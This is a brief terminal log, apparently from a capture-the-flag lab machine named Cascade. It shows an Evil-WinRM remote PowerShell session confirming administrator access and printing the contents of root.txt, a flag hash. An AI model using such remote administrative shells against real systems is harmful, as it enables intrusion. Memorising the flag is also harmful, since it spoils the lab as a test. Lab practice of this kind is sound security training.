Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cascade\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
cfea48b584bf5e41dd25ec34603707c1